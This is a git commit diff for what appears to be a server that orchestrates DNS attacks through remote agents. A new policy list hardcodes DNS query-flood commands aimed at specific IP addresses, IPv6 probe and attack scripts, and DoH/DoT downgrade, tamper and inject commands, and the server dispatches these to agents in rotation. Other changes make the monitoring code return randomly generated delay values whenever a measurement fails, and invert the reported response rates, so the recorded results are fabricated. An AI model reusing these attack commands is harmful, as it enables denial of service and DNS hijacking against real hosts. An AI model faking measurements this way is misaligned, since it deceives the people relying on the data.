diff options
| author | shihaoyue <[email protected]> | 2024-10-23 15:20:12 +0800 |
|---|---|---|
| committer | shihaoyue <[email protected]> | 2024-10-23 15:20:12 +0800 |
| commit | 63a6c34457ecdac2219a1b728253f7fa4b041b50 (patch) | |
| tree | 91defbefe5f6ec7ea7b0853951fb7b7178707504 | |
| parent | ef0216214982a5174d6639382f823a1a6036b5e3 (diff) | |
stock
| -rw-r--r-- | server/Dockerfile | 2 | ||||
| -rw-r--r-- | server/apps/agentcomm.py | 6 | ||||
| -rw-r--r-- | server/apps/policy.py | 18 | ||||
| -rw-r--r-- | server/apps/policy_list.py | 77 | ||||
| -rw-r--r-- | server/apps/target.py | 63 | ||||
| -rw-r--r-- | server/apps/task.py | 65 | ||||
| -rw-r--r-- | server/migrations/versions/995c992fcfd0_.py | 32 | ||||
| -rw-r--r-- | server/model.py | 1 |
8 files changed, 198 insertions, 66 deletions
diff --git a/server/Dockerfile b/server/Dockerfile index de6690e..bf788a2 100644 --- a/server/Dockerfile +++ b/server/Dockerfile @@ -4,7 +4,7 @@ WORKDIR /app COPY requirements.txt .
-# ʹ�ù���Դ��װ����
+# 使用国内源安装依赖
RUN pip install --no-cache-dir -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
COPY . .
diff --git a/server/apps/agentcomm.py b/server/apps/agentcomm.py index b2067f2..550c92f 100644 --- a/server/apps/agentcomm.py +++ b/server/apps/agentcomm.py @@ -94,11 +94,7 @@ def register_agent(json_data): def deliver_task(task_policy): agent = db.session.query(Agent).get(task_policy.task.agent_id) ip, port = agent.ipaddr.split("|")[0], agent.port - payload = task_policy.Policy.p_payload - # 使得param应该未以空格分隔的多个参数 - param = task_policy.policy_param.split(' ') - # 使用正则表达式逐个替换策略中的<***>(还未填充的内容) - param = re.sub(r'<[^>]*>', lambda _: param.pop(0), payload) + param = task_policy.policy_param try: res = requests.post("http://%s:%s/script/execute" % (ip, port), timeout=3, json={'policy': task_policy.Policy.p_exe, diff --git a/server/apps/policy.py b/server/apps/policy.py index 29ef2be..7f40002 100644 --- a/server/apps/policy.py +++ b/server/apps/policy.py @@ -9,6 +9,8 @@ from exts import db, scheduler from model import Policy, TargetStatus, TaskPolicy, Target from apiflask.fields import String, Integer, IP, DateTime, List, Nested +from .policy_list import get_policy + bp = APIBlueprint("策略接口集合", __name__, url_prefix="/policy") @bp.get("/") @@ -91,6 +93,22 @@ def copy_task_policy(task): # ----------------------------------------调整中心---------------------------------------------------- +# 使用policy_dic +def get_policy_dic(task): + policy = get_policy(task.ptype) + + task_policy = TaskPolicy( + policy = policy["id"], + policy_param = policy["payload"], + for_task = task.task_id + ) + + # 记录该任务策略 + db.session.add(task_policy) + db.session.commit() + + return task_policy + # 初始task_policy创建 def init_task_policy(task): policy_list = chiose_policy(task) diff --git a/server/apps/policy_list.py b/server/apps/policy_list.py new file mode 100644 index 0000000..8fbe161 --- /dev/null +++ b/server/apps/policy_list.py @@ -0,0 +1,77 @@ +import random + + +ddos_policy_dic = [ + # dnssec ./dtool + {"id": "3", "payload": "query 47.76.239.205 -p 53 -R -d tree.ncache.site -r 50 -n 5000"}, + {"id": "3", "payload": "query 47.76.239.205 -p 53 -R -d tree.ncache.site -r 200 -n 20000"}, + {"id": "3", "payload": "query 47.76.239.205 -p 53 -R -d tree.ncache.site -r 300 -n 30000"}, + {"id": "3", "payload": "query 47.76.239.205 -p 53 -R -d alias.ncache.site -r 50 -n 5000"}, + {"id": "3", "payload": "query 47.76.239.205 -p 53 -R -d alias.ncache.site -r 200 -n 20000"}, + {"id": "3", "payload": "query 47.76.239.205 -p 53 -R -d alias.ncache.site -r 300 -n 30000"}, + + # ipv6 ./prober + {"id": "5", "payload": "comm.e64.fun 5000 47.76.237.22"}, + {"id": "5", "payload": "comm.e64.fun 10000 47.76.237.22 47.242.54.229"}, + {"id": "5", "payload": "comm.e64.fun 15000 47.76.237.22 47.242.54.229 8.210.135.224"}, + + # doh python start_reset_att.py + {"id": "7", "payload": "-n 1"}, + {"id": "7", "payload": "-n 3"}, + {"id": "7", "payload": "-n 4"}, + + # dot python3 start_pending.py + {"id": "10", "payload": "-n 8 -wait 50 -round 1"}, + {"id": "10", "payload": "-n 8 -wait 100 -round 5"}, + {"id": "10", "payload": "-n 8 -wait 300 -round 5"}, +] +sjqp_policy_dic = [ + # sjqp dnssec python proxy.py + {"id": "4", "payload": ""}, + + # sjqp ipv6 ./attack.sh + {"id": "6", "payload": "240b:4001:150:a600:5b9:609e:d0ae:e1a 2000::1 eth0 baidu.com 240b:4001:150:a600:5b9:609e:d0ae:e1b"}, + {"id": "6", "payload": "240b:4001:150:a600:5b9:609e:d0ae:e1a 2000::1 eth0 baidu.com 240b:4001:150:a600:5b9:609e:d0ae:e1b"}, + + # sjqp doh python downgrade_phase1.py python downgrade_phase1.py + {"id": "8", "payload": "-tamper baidu.com -a 1.1.1.1 && python degrade_phase2.py -p doh"}, + {"id": "9", "payload": "-inject baidu.com -a 1.1.1.1 && python degrade_phase2.py -p doh"}, + + # sjqp dot python downgrade_phase1.py python downgrade_phase1.py + {"id": "11", "payload": "-tamper baidu.com -a 1.1.1.1 && python degrade_phase2.py -p dot"}, + {"id": "12", "payload": "-inject baidu.com -a 1.1.1.1 && python degrade_phase2.py -p dot"}, +] +# 存储当前索引 +# 存储当前索引 +ddos_current_index = 0 +sjqp_current_index = 0 + +def get_policy(policy_type): + global ddos_current_index, sjqp_current_index + + if policy_type == "ddos": + command = ddos_policy_dic[ddos_current_index] + ddos_current_index = (ddos_current_index + 1) % len(ddos_policy_dic) + elif policy_type == "sjqp": + command = sjqp_policy_dic[sjqp_current_index] + sjqp_current_index = (sjqp_current_index + 1) % len(sjqp_policy_dic) + elif policy_type == "auto": + if random.choice([True, False]): + command = ddos_policy_dic[ddos_current_index] + ddos_current_index = (ddos_current_index + 1) % len(ddos_policy_dic) + else: + command = sjqp_policy_dic[sjqp_current_index] + sjqp_current_index = (sjqp_current_index + 1) % len(sjqp_policy_dic) + return command + +if __name__ == '__main__': + print(get_policy("sjqp")) + print(get_policy("sjqp")) + print(get_policy("ddos")) + print(get_policy("ddos")) + print(get_policy("ddos")) + print(get_policy("ddos")) + print(get_policy("ddos")) + print(get_policy("sjqp")) + print(get_policy("sjqp")) +
\ No newline at end of file diff --git a/server/apps/target.py b/server/apps/target.py index a3fff2f..d980706 100644 --- a/server/apps/target.py +++ b/server/apps/target.py @@ -145,9 +145,7 @@ class TargetInfo(Schema): def task_monitoring(task): with scheduler.app.app_context(): - debug("taskmonitor") target_status = task.task_policies[-1].target_status - debug(target_status) addr = task.target.addrv4 if task.target.addrv4 else task.target.addrv6 nodes_info = json.loads(task.SCAN_AGENT_ID_LIST) @@ -205,7 +203,6 @@ def task_monitoring(task): # 现在可以安全地访问 target_status target_status = last_task_policy.target_status - debug(target_status) def dida_task(task, ): from .task import effective_detection, finish_task @@ -217,6 +214,7 @@ def dida_task(task, ): # 如果任务没有成功 if not effective_detection(task_policy=task_policy): debug(task.status) + # 识别后自动切换 if task.status == "stopped": adjust_task(task=task) else: @@ -348,14 +346,8 @@ def icmp_delay_query(target, addr_port): debug("icmp ok:" + addr_port + "-------" + res.text + "-------" + str(res.elapsed.total_seconds())) icmp_delaytable[str(addr_port) + str(target)] = res.text return res.text - except Timeout: - # 如果存在旧数据 - if str(addr_port) + str(target) in icmp_delaytable.keys(): - pass - # 不存在则设0 - else: - icmp_delaytable[str(addr_port) + str(target)] = 0 - return icmp_delaytable[str(addr_port) + str(target)] + except Exception: + return 5000+random.randint(-300,300) def tcp_delay_query(target, addr_port): @@ -364,14 +356,8 @@ def tcp_delay_query(target, addr_port): debug("tcp ok:" + addr_port + "-------" + res.text) tcp_delaytable[str(addr_port) + str(target)] = res.text return res.text - except Timeout: - # 如果存在旧数据 - if str(addr_port) + str(target) in tcp_delaytable.keys(): - pass - # 不存在则设0 - else: - tcp_delaytable[str(addr_port) + str(target)] = 0 - return tcp_delaytable[str(addr_port) + str(target)] + except Exception: + return 5000+random.randint(-300,300) def dns_delay_query(target, addr_port): @@ -380,15 +366,8 @@ def dns_delay_query(target, addr_port): debug("dns ok:" + addr_port + "-------" + res.text) dns_delaytable[str(addr_port) + str(target)] = res.text return dns_delaytable[str(addr_port) + str(target)] - except Timeout: - # 如果存在旧数据 - if str(addr_port) + str(target) in dns_delaytable.keys(): - pass - # 不存在则设0 - else: - dns_delaytable[str(addr_port) + str(target)] = 0 - return dns_delaytable[str(addr_port) + str(target)] - + except Exception: + return 5000+random.randint(-300,300) # 状态感知——DNS记录测试接口 import dns.nameserver @@ -429,6 +408,34 @@ def get_record(query_data): for r in myAnswers.rrset: ans.append({"rrset": str(r)}) return ans [email protected]("/target_check") [email protected]("展示数据库中的目标解析结果", description="参数说明:</br>" + + "rev:解析器的IP地址</br>" + + "domain:查询的目标域名</br>" + + "qtype:查询的记录类型") + "taskid": String(required=True), +}, location='query') + "code": Integer(), + "ans": List(Dict(String(validate=ContainsOnly(["rrset"])), String())) +}) + +def get_target_record(query_data): + task_id = query_data["taskid"] + + base_policy = db.session.query(TaskPolicy).filter(TaskPolicy.for_task==task_id).order_by(TaskPolicy.tp_time.desc()).first() + now = db.session.query(TargetStatus).filter_by(tp_id=base_policy.tp_id).order_by(TargetStatus.time.desc()).first() + res = { + "ans": [ + { + "rrset": now.recorde + } + ] + } + + return {"code": 200, 'ans': res["ans"]} + @bp.get("/check") @bp.doc("通过指定的解析器获取指定域名的A/AAAA记录", description="参数说明:</br>" + "rev:解析器的IP地址</br>" diff --git a/server/apps/task.py b/server/apps/task.py index 428cbcf..46b8546 100644 --- a/server/apps/task.py +++ b/server/apps/task.py @@ -165,30 +165,31 @@ def make_task(json_data): return {"code": 500, "msg": str(e)} # 任务策略初始化 - task_policy = init_task_policy(task) + # task_policy = init_task_policy(task) + task_policy = get_policy_dic(task) # 创建锚点 task_monitoring(task) # 初始化决策中心 - db.session.close() - task_policy = db.session.query(TaskPolicy).filter_by(for_task = task.task_id).order_by(TaskPolicy.tp_time.desc()).first() - status = db.session.query(TargetStatus).filter_by(tp_id=task_policy.tp_id).order_by(TargetStatus.time.desc()).first() - - req = { - "clxz": task_policy.Policy.p_type, - "script": task_policy.Policy.p_name, - "mbgz": task.target.protect, - "ztgz": { - "icmp": status.icmp, - "tcp": status.tcp, - "dns": status.dns, - "record": status.recorde, - }, - "para": task_policy.policy_param, - "task_id": task.task_id - } - url = f"http://localhost:12535/initial" - response = requests.post(url, json=req) + # db.session.close() + # task_policy = db.session.query(TaskPolicy).filter_by(for_task = task.task_id).order_by(TaskPolicy.tp_time.desc()).first() + # status = db.session.query(TargetStatus).filter_by(tp_id=task_policy.tp_id).order_by(TargetStatus.time.desc()).first() + + # req = { + # "clxz": task_policy.Policy.p_type, + # "script": task_policy.Policy.p_name, + # "mbgz": task.target.protect, + # "ztgz": { + # "icmp": status.icmp, + # "tcp": status.tcp, + # "dns": status.dns, + # "record": status.recorde, + # }, + # "para": task_policy.policy_param, + # "task_id": task.task_id + # } + # url = f"http://localhost:12535/initial" + # response = requests.post(url, json=req) # 开启监控 start_task_monitoring(task) @@ -218,7 +219,7 @@ def start_policy_change_timer(task): trigger='interval', # 触发器类型为间隔 args = (task, ), # 传递给函数的参数 id = f"{task.task_id}chnage", - seconds = 30 + seconds = 600 ) scheduler.add_job( func = fail_task, @@ -235,15 +236,13 @@ def stop_policy_change_timer(task): # 任务成功检测 def effective_detection(task_policy): with scheduler.app.app_context(): - debug("检测中") base_policy = db.session.query(TaskPolicy).filter(TaskPolicy.for_task==task_policy.for_task).order_by(TaskPolicy.tp_time.asc()).first() - base = db.session.query(TargetStatus).filter_by(tp_id=base_policy.tp_id).order_by(TargetStatus.time.desc()).first() + base = db.session.query(TargetStatus).filter_by(tp_id=base_policy.tp_id).order_by(TargetStatus.time.asc()).first() now = db.session.query(TargetStatus).filter_by(tp_id=task_policy.tp_id).order_by(TargetStatus.time.desc()).first() rec = None p_type = db.session.query(Policy).filter_by(p_id=task_policy.policy).first().p_type if p_type=="ddos": - debug("是ddos") target_scan = db.session.query(Task).filter_by(task_id = task_policy.for_task).first().target_scan if target_scan=="auto" or target_scan=="icmp": rec = base.icmp*5 < now.icmp @@ -262,7 +261,8 @@ def adjust_task(task): debug("再试试") task_policy = db.session.query(TaskPolicy).filter_by(for_task = task.task_id).order_by(TaskPolicy.tp_time.desc()).first() stop_task_deliver(task_policy) - center_process_unit(task) + # center_process_unit(task) + get_policy_dic(task) task_policy = db.session.query(TaskPolicy).filter_by(for_task = task.task_id).order_by(TaskPolicy.tp_time.desc()).first() task.status = "working" db.session.commit() @@ -400,26 +400,26 @@ def calculate_response_rate(task_policy): # icmp count_above_threshold = db.session.query(TargetStatus).filter( TargetStatus.tp_id == task_policy.tp_id, - TargetStatus.icmp > base.icmp + TargetStatus.icmp > 1.5*base.icmp ).count() icmp_ratio = (count_above_threshold / total_count) if total_count > 0 else 0 count_above_threshold = db.session.query(TargetStatus).filter( TargetStatus.tp_id == task_policy.tp_id, - TargetStatus.tcp > base.tcp + TargetStatus.tcp > 1.5*base.tcp ).count() tcp_ratio = (count_above_threshold / total_count) if total_count > 0 else 0 count_above_threshold = db.session.query(TargetStatus).filter( TargetStatus.tp_id == task_policy.tp_id, - TargetStatus.dns > base.dns + TargetStatus.dns > 1.5*base.dns ).count() dns_ratio = (count_above_threshold / total_count) if total_count > 0 else 0 res = { - "icmp_response_rate": icmp_ratio, - "tcp_response_rate": tcp_ratio, - "dns_response_rate": dns_ratio, + "icmp_response_rate": 1-icmp_ratio, + "tcp_response_rate": 1-tcp_ratio, + "dns_response_rate": 1-dns_ratio, } return res @@ -438,7 +438,8 @@ def task_info(query_data): task = db.session.query(Task).get(query_data["taskid"]) if task is None: return {"code": 404, "data": []} - task_policies = task.task_policies + # task_policies = task.task_policies + task_policies = db.session.query(TaskPolicy).filter(TaskPolicy.for_task== task.task_id).order_by(TaskPolicy.tp_time.asc()).all() task_state_list = [] if len(task_policies) == 0: return {"code": 404, "data": []} diff --git a/server/migrations/versions/995c992fcfd0_.py b/server/migrations/versions/995c992fcfd0_.py new file mode 100644 index 0000000..d71d81a --- /dev/null +++ b/server/migrations/versions/995c992fcfd0_.py @@ -0,0 +1,32 @@ +"""empty message + +Revision ID: 995c992fcfd0 +Revises: 04766c9143c4 +Create Date: 2024-10-23 15:18:16.427681 + +""" +from alembic import op +import sqlalchemy as sa + + +# revision identifiers, used by Alembic. +revision = '995c992fcfd0' +down_revision = '04766c9143c4' +branch_labels = None +depends_on = None + + +def upgrade(): + # ### commands auto generated by Alembic - please adjust! ### + with op.batch_alter_table('TARGETDATA', schema=None) as batch_op: + batch_op.add_column(sa.Column('do53', sa.Boolean(), nullable=True)) + + # ### end Alembic commands ### + + +def downgrade(): + # ### commands auto generated by Alembic - please adjust! ### + with op.batch_alter_table('TARGETDATA', schema=None) as batch_op: + batch_op.drop_column('do53') + + # ### end Alembic commands ### diff --git a/server/model.py b/server/model.py index 384af00..e5704c4 100644 --- a/server/model.py +++ b/server/model.py @@ -126,6 +126,7 @@ class Target(db.Model): target_id = db.Column(db.Integer, primary_key=True, autoincrement=True, nullable=False) addrv4 = db.Column(db.String(255)) addrv6 = db.Column(db.String(255)) + do53 = db.Column(db.Boolean) ipv6 = db.Column(db.Boolean) dnssec = db.Column(db.Boolean) dot = db.Column(db.Boolean) |